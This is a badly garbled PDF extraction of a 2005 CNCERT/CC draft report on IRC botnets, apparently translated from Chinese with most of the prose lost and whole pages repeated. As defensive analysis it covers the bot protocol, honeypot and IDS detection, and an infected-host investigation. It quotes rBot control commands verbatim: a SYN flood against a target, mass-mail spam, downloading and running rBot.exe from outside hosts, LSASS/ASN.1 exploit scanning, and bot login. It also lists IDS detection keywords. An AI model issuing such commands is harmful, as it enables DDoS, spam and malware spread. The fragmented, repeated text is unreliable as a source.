[12] httpwwwciphertrustcomresourcesstatisticszombiephp

[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml

[14] Lurhq Threat Intelligence Group

Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml

[15] httpwwwsymanteccompressindex_2004html

[16] Tom Vogt Simulating and optimising worm propagation algorithms

wwwsecurityfocuscomguest24046 20039

This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only

Page 6: Worm DDos Spam - SecurityCN.net · CNCERT/CC CNCERT/CC CNCERTCC_TR_2005-001(Draft) Worm DDos Spam Phishing Spyware Botnet [1] Bot DDos DDos Bot: ±Robo Bot

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc263net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc263net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Phi s h i ng

3 (Spam)

Spammer

blacklist

1

-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml

mm mass mail httpwww recptcom

fetchphp php

httpwwwmailnetemailhtml

ip spammer

2 socks v4v5 Open Relay

Spammer Open Proxy Open Mail Relay

Open Relay Server Open Mail Relay Spammer

Spammer Proxy Open Relay Proxy

Open Relay Spammer Proxy Open Relay

Spammer

socks v4 Smtp Open Relay

socks v4 Open Relay

IP ISP IP

3

email AgoBot

harvestemails

4 (Spyware)

Spyware Keylogger

-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1

httpwwwelitecodersnet updateexe crBotexe 1

Windows Bot

Bot bot

PINGPONG bot

IRC TCP 6667 CNCERTCC

bot bot

cmdexe plusmnnetst at an IP

IP

135 445

fportexe netstat

11

bot

CD-Key

bot

bot ie

ie bot rootkit [2]

bot rootkit

rootkit bot

CNCERTCC

1 honeypot bot

2) IDS

3

IRC

1 Honeypot

bot bot Honeywall

bot dnsip

windows 25 [11]

bot bot

[3] honeynet project 2004 11

2005 3 1 HoneyWall 1 mwcollect[8]

180

30 5500 800 2004

11 2005 1 406 Ddos 179 [4]

2

IRC IDS IRC Bot JOIN PASS

PRIVMSG NICK TOPIC NOTICE

IRC TCP

udp syn ddos http download exe update scan exploit login

logon advscan lsass dcom beagle dameware

3

1 bot(fast joining bots)

bots IRC

IRC

2) bot(Long standing connection)

bots

3) bot(not talkative)

Bots bot pingpong

DdoSVax [5] Bot

4

1

IDS bot

bot bot

bot bot

IDS IRC

2

IDS IRC

Bot IRC IRC RFC IDS

bot

IRC IRC

3

IDS

bot

IDS

socks v4

Server plusmnTOPI rBot advscan lsass 200 5 0 -r s

a

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

b

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

c) Botnet bot

lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass

200 5 0 -r srn

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

TOPIC IP IP

IP

3

bot

bot

Bot

login logon auth

bot bot nick

host rBot v065

1

-gtPRIVMSG rbot login password sn

IP

2 bot

lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn

1 2

IP Bot

host

IP

lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn

10101010 login

3 rBot NICK

ControllerNICK USER(ControllerUSER) host (login) (password

-s) rBot

user host rBot

host net com net

com rBot host com net

()

4 -s silent bot

-gtPRIVMSG rbot password acceptedn

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Guutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe

IP 10001

sniffer

cmdexe

cgtnetstat anrn

TCP 0000135 00000 LISTENING

TCP 0000445 00000 LISTENING

TCP 100011150 203151217856667 ESTABLISHED

TCP 100011616 20210832137445 FIN_WAIT_1

TCP 100011631 20210832147445 FIN_WAIT_1

TCP 100011714 20210832190445 FIN_WAIT_1

TCP 100011727 20210832165445 FIN_WAIT_1

TCP 100012253 20210834211445 TIME_WAIT

TCP 100012904 2021083791445 TIME_WAIT

TCP 100013476 20210839151445 TIME_WAIT

TCP 100013478 20210839153445 TIME_WAIT

TCP 100013480 20210839155445 TIME_WAIT

TCP 100013486 20210839151445 TIME_WAIT

TCP 100013487 20210839153445 TIME_WAIT

TCP 100013488 20210839155445 TIME_WAIT

TCP 100013673 2021084082445 TIME_WAIT

TCP 100013674 2021084082445 TIME_WAIT

TCP 100014953 2021084520445 TIME_WAIT

TCP 100014955 2021084520445 TIME_WAIT

TCP 100014959 2021084523445 TIME_WAIT

TCP 100014961 2021084523445 TIME_WAIT

UDP 000069 UDP 69

UDP 0000445

UDP 10001137

UDP 10001138

fportexe

C gtfport | find 1150 1150 6667

1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe

Cgtfport | find 69

1048 wininit -gt 69 UDP CWINNTsystem32wininitexe

6667 69 wininitexe rBot

wininitexe sysinternals FileMon

bot sysinternals autoruns

rBot

HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe

HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe

Wininit 445 6667

IP

20315121785 6667

TCP

Wininit IRC

-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )

-gtJOIN xdcc dropitrn ( xdcc dropit)

lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (

advscan asn1smb )

-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0

min using 100 threadsrn( )

CNCERTCC 2005

[1]

20054

[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005

httpwwweweekcomarticle201759181697200asp

[3] honeynet project plusmn Kno w your ene my

Tracking Botnet

[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks

Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual

[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann

wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf

[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005

[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier

Microsoft Research ACM SIGCOMM 2004

[8] httpwwwmwcollectorg

[9] httpwwwcertorg

[10] httpwwwmessagelabcouk

[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o

wwwsdissaorgdownloadsemergingthreats-publicpdf

[12] httpwwwciphertrustcomresourcesstatisticszombiephp

[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml

[14] Lurhq Threat Intelligence Group

Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml

[15] httpwwwsymanteccompressindex_2004html

[16] Tom Vogt Simulating and optimising worm propagation algorithms

wwwsecurityfocuscomguest24046 20039

This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only

Page 7: Worm DDos Spam - SecurityCN.net · CNCERT/CC CNCERT/CC CNCERTCC_TR_2005-001(Draft) Worm DDos Spam Phishing Spyware Botnet [1] Bot DDos DDos Bot: ±Robo Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Phi s h i ng

3 (Spam)

Spammer

blacklist

1

-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml

mm mass mail httpwww recptcom

fetchphp php

httpwwwmailnetemailhtml

ip spammer

2 socks v4v5 Open Relay

Spammer Open Proxy Open Mail Relay

Open Relay Server Open Mail Relay Spammer

Spammer Proxy Open Relay Proxy

Open Relay Spammer Proxy Open Relay

Spammer

socks v4 Smtp Open Relay

socks v4 Open Relay

IP ISP IP

3

email AgoBot

harvestemails

4 (Spyware)

Spyware Keylogger

-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1

httpwwwelitecodersnet updateexe crBotexe 1

Windows Bot

Bot bot

PINGPONG bot

IRC TCP 6667 CNCERTCC

bot bot

cmdexe plusmnnetst at an IP

IP

135 445

fportexe netstat

11

bot

CD-Key

bot

bot ie

ie bot rootkit [2]

bot rootkit

rootkit bot

CNCERTCC

1 honeypot bot

2) IDS

3

IRC

1 Honeypot

bot bot Honeywall

bot dnsip

windows 25 [11]

bot bot

[3] honeynet project 2004 11

2005 3 1 HoneyWall 1 mwcollect[8]

180

30 5500 800 2004

11 2005 1 406 Ddos 179 [4]

2

IRC IDS IRC Bot JOIN PASS

PRIVMSG NICK TOPIC NOTICE

IRC TCP

udp syn ddos http download exe update scan exploit login

logon advscan lsass dcom beagle dameware

3

1 bot(fast joining bots)

bots IRC

IRC

2) bot(Long standing connection)

bots

3) bot(not talkative)

Bots bot pingpong

DdoSVax [5] Bot

4

1

IDS bot

bot bot

bot bot

IDS IRC

2

IDS IRC

Bot IRC IRC RFC IDS

bot

IRC IRC

3

IDS

bot

IDS

socks v4

Server plusmnTOPI rBot advscan lsass 200 5 0 -r s

a

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

b

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

c) Botnet bot

lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass

200 5 0 -r srn

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

TOPIC IP IP

IP

3

bot

bot

Bot

login logon auth

bot bot nick

host rBot v065

1

-gtPRIVMSG rbot login password sn

IP

2 bot

lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn

1 2

IP Bot

host

IP

lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn

10101010 login

3 rBot NICK

ControllerNICK USER(ControllerUSER) host (login) (password

-s) rBot

user host rBot

host net com net

com rBot host com net

()

4 -s silent bot

-gtPRIVMSG rbot password acceptedn

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Guutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe

IP 10001

sniffer

cmdexe

cgtnetstat anrn

TCP 0000135 00000 LISTENING

TCP 0000445 00000 LISTENING

TCP 100011150 203151217856667 ESTABLISHED

TCP 100011616 20210832137445 FIN_WAIT_1

TCP 100011631 20210832147445 FIN_WAIT_1

TCP 100011714 20210832190445 FIN_WAIT_1

TCP 100011727 20210832165445 FIN_WAIT_1

TCP 100012253 20210834211445 TIME_WAIT

TCP 100012904 2021083791445 TIME_WAIT

TCP 100013476 20210839151445 TIME_WAIT

TCP 100013478 20210839153445 TIME_WAIT

TCP 100013480 20210839155445 TIME_WAIT

TCP 100013486 20210839151445 TIME_WAIT

TCP 100013487 20210839153445 TIME_WAIT

TCP 100013488 20210839155445 TIME_WAIT

TCP 100013673 2021084082445 TIME_WAIT

TCP 100013674 2021084082445 TIME_WAIT

TCP 100014953 2021084520445 TIME_WAIT

TCP 100014955 2021084520445 TIME_WAIT

TCP 100014959 2021084523445 TIME_WAIT

TCP 100014961 2021084523445 TIME_WAIT

UDP 000069 UDP 69

UDP 0000445

UDP 10001137

UDP 10001138

fportexe

C gtfport | find 1150 1150 6667

1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe

Cgtfport | find 69

1048 wininit -gt 69 UDP CWINNTsystem32wininitexe

6667 69 wininitexe rBot

wininitexe sysinternals FileMon

bot sysinternals autoruns

rBot

HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe

HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe

Wininit 445 6667

IP

20315121785 6667

TCP

Wininit IRC

-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )

-gtJOIN xdcc dropitrn ( xdcc dropit)

lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (

advscan asn1smb )

-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0

min using 100 threadsrn( )

CNCERTCC 2005

[1]

20054

[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005

httpwwweweekcomarticle201759181697200asp

[3] honeynet project plusmn Kno w your ene my

Tracking Botnet

[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks

Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual

[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann

wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf

[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005

[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier

Microsoft Research ACM SIGCOMM 2004

[8] httpwwwmwcollectorg

[9] httpwwwcertorg

[10] httpwwwmessagelabcouk

[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o

wwwsdissaorgdownloadsemergingthreats-publicpdf

[12] httpwwwciphertrustcomresourcesstatisticszombiephp

[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml

[14] Lurhq Threat Intelligence Group

Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml

[15] httpwwwsymanteccompressindex_2004html

[16] Tom Vogt Simulating and optimising worm propagation algorithms

wwwsecurityfocuscomguest24046 20039

This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only

Page 8: Worm DDos Spam - SecurityCN.net · CNCERT/CC CNCERT/CC CNCERTCC_TR_2005-001(Draft) Worm DDos Spam Phishing Spyware Botnet [1] Bot DDos DDos Bot: ±Robo Bot

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Phi s h i ng

3 (Spam)

Spammer

blacklist

1

-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml

mm mass mail httpwww recptcom

fetchphp php

httpwwwmailnetemailhtml

ip spammer

2 socks v4v5 Open Relay

Spammer Open Proxy Open Mail Relay

Open Relay Server Open Mail Relay Spammer

Spammer Proxy Open Relay Proxy

Open Relay Spammer Proxy Open Relay

Spammer

socks v4 Smtp Open Relay

socks v4 Open Relay

IP ISP IP

3

email AgoBot

harvestemails

4 (Spyware)

Spyware Keylogger

-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1

httpwwwelitecodersnet updateexe crBotexe 1

Windows Bot

Bot bot

PINGPONG bot

IRC TCP 6667 CNCERTCC

bot bot

cmdexe plusmnnetst at an IP

IP

135 445

fportexe netstat

11

bot

CD-Key

bot

bot ie

ie bot rootkit [2]

bot rootkit

rootkit bot

CNCERTCC

1 honeypot bot

2) IDS

3

IRC

1 Honeypot

bot bot Honeywall

bot dnsip

windows 25 [11]

bot bot

[3] honeynet project 2004 11

2005 3 1 HoneyWall 1 mwcollect[8]

180

30 5500 800 2004

11 2005 1 406 Ddos 179 [4]

2

IRC IDS IRC Bot JOIN PASS

PRIVMSG NICK TOPIC NOTICE

IRC TCP

udp syn ddos http download exe update scan exploit login

logon advscan lsass dcom beagle dameware

3

1 bot(fast joining bots)

bots IRC

IRC

2) bot(Long standing connection)

bots

3) bot(not talkative)

Bots bot pingpong

DdoSVax [5] Bot

4

1

IDS bot

bot bot

bot bot

IDS IRC

2

IDS IRC

Bot IRC IRC RFC IDS

bot

IRC IRC

3

IDS

bot

IDS

socks v4

Server plusmnTOPI rBot advscan lsass 200 5 0 -r s

a

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

b

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

c) Botnet bot

lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass

200 5 0 -r srn

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

TOPIC IP IP

IP

3

bot

bot

Bot

login logon auth

bot bot nick

host rBot v065

1

-gtPRIVMSG rbot login password sn

IP

2 bot

lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn

1 2

IP Bot

host

IP

lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn

10101010 login

3 rBot NICK

ControllerNICK USER(ControllerUSER) host (login) (password

-s) rBot

user host rBot

host net com net

com rBot host com net

()

4 -s silent bot

-gtPRIVMSG rbot password acceptedn

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Guutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe

IP 10001

sniffer

cmdexe

cgtnetstat anrn

TCP 0000135 00000 LISTENING

TCP 0000445 00000 LISTENING

TCP 100011150 203151217856667 ESTABLISHED

TCP 100011616 20210832137445 FIN_WAIT_1

TCP 100011631 20210832147445 FIN_WAIT_1

TCP 100011714 20210832190445 FIN_WAIT_1

TCP 100011727 20210832165445 FIN_WAIT_1

TCP 100012253 20210834211445 TIME_WAIT

TCP 100012904 2021083791445 TIME_WAIT

TCP 100013476 20210839151445 TIME_WAIT

TCP 100013478 20210839153445 TIME_WAIT

TCP 100013480 20210839155445 TIME_WAIT

TCP 100013486 20210839151445 TIME_WAIT

TCP 100013487 20210839153445 TIME_WAIT

TCP 100013488 20210839155445 TIME_WAIT

TCP 100013673 2021084082445 TIME_WAIT

TCP 100013674 2021084082445 TIME_WAIT

TCP 100014953 2021084520445 TIME_WAIT

TCP 100014955 2021084520445 TIME_WAIT

TCP 100014959 2021084523445 TIME_WAIT

TCP 100014961 2021084523445 TIME_WAIT

UDP 000069 UDP 69

UDP 0000445

UDP 10001137

UDP 10001138

fportexe

C gtfport | find 1150 1150 6667

1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe

Cgtfport | find 69

1048 wininit -gt 69 UDP CWINNTsystem32wininitexe

6667 69 wininitexe rBot

wininitexe sysinternals FileMon

bot sysinternals autoruns

rBot

HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe

HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe

Wininit 445 6667

IP

20315121785 6667

TCP

Wininit IRC

-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )

-gtJOIN xdcc dropitrn ( xdcc dropit)

lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (

advscan asn1smb )

-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0

min using 100 threadsrn( )

CNCERTCC 2005

[1]

20054

[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005

httpwwweweekcomarticle201759181697200asp

[3] honeynet project plusmn Kno w your ene my

Tracking Botnet

[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks

Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual

[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann

wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf

[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005

[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier

Microsoft Research ACM SIGCOMM 2004

[8] httpwwwmwcollectorg

[9] httpwwwcertorg

[10] httpwwwmessagelabcouk

[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o

wwwsdissaorgdownloadsemergingthreats-publicpdf

[12] httpwwwciphertrustcomresourcesstatisticszombiephp

[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml

[14] Lurhq Threat Intelligence Group

Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml

[15] httpwwwsymanteccompressindex_2004html

[16] Tom Vogt Simulating and optimising worm propagation algorithms

wwwsecurityfocuscomguest24046 20039

This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only

Page 9: Worm DDos Spam - SecurityCN.net · CNCERT/CC CNCERT/CC CNCERTCC_TR_2005-001(Draft) Worm DDos Spam Phishing Spyware Botnet [1] Bot DDos DDos Bot: ±Robo Bot

Phi s h i ng

3 (Spam)

Spammer

blacklist

1

-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml

mm mass mail httpwww recptcom

fetchphp php

httpwwwmailnetemailhtml

ip spammer

2 socks v4v5 Open Relay

Spammer Open Proxy Open Mail Relay

Open Relay Server Open Mail Relay Spammer

Spammer Proxy Open Relay Proxy

Open Relay Spammer Proxy Open Relay

Spammer

socks v4 Smtp Open Relay

socks v4 Open Relay

IP ISP IP

3

email AgoBot

harvestemails

4 (Spyware)

Spyware Keylogger

-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1

httpwwwelitecodersnet updateexe crBotexe 1

Windows Bot

Bot bot

PINGPONG bot

IRC TCP 6667 CNCERTCC

bot bot

cmdexe plusmnnetst at an IP

IP

135 445

fportexe netstat

11

bot

CD-Key

bot

bot ie

ie bot rootkit [2]

bot rootkit

rootkit bot

CNCERTCC

1 honeypot bot

2) IDS

3

IRC

1 Honeypot

bot bot Honeywall

bot dnsip

windows 25 [11]

bot bot

[3] honeynet project 2004 11

2005 3 1 HoneyWall 1 mwcollect[8]

180

30 5500 800 2004

11 2005 1 406 Ddos 179 [4]

2

IRC IDS IRC Bot JOIN PASS

PRIVMSG NICK TOPIC NOTICE

IRC TCP

udp syn ddos http download exe update scan exploit login

logon advscan lsass dcom beagle dameware

3

1 bot(fast joining bots)

bots IRC

IRC

2) bot(Long standing connection)

bots

3) bot(not talkative)

Bots bot PING/PONG

DDoSVax [5] Bot

4

1

IDS bot

bot bot

bot bot

IDS IRC

2

IDS IRC

Bot IRC IRC RFC IDS

bot

IRC IRC

3

IDS

bot

IDS

socks v4

Server "TOPIC #rBot :.advscan lsass 200 5 0 -r -s"

a

->TOPIC #rBot :.advscan lsass 200 5 0 -r -s\n

b

->TOPIC #rBot :.advscan lsass 200 5 0 -r -s\n

c) Botnet bot

<-:ControllerNICK!ControllerUSER@socks(HOST or IP) TOPIC #rBot :.advscan lsass 200 5 0 -r -s\r\n

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 ... ServN

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1) .advscan lsass 200 5 0 -r -s

LSASS 200 5 -r = random

-s = silent

2) .httpupdate http://server/rBot.exe c:\rBot.exe 1

server rBot.exe c:\ 1

CNCERTCC TOPIC Bot

TOPIC "JOIN #newchannel"

TOPIC PRIVMSG

bot bot bot TOPIC

TOPIC IP IP

IP

3

bot

bot

Bot

login logon auth

bot bot nick

host rBot v065

1

->PRIVMSG #rbot :.login password -s\n

IP

2 bot

<-:ControllerNICK!ControllerUSER@host PRIVMSG #rbot :.login password -s\r\n

1 2

IP Bot

host

IP

<-:ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG #rbot :.login password -s\r\n

10.10.10.10 login

3 rBot NICK

ControllerNICK USER(ControllerUSER) host (login) (password

-s) rBot

user host rBot

host net com net

com rBot host com net

()

4 -s silent bot

->PRIVMSG #rbot :password accepted\n

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Gnutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

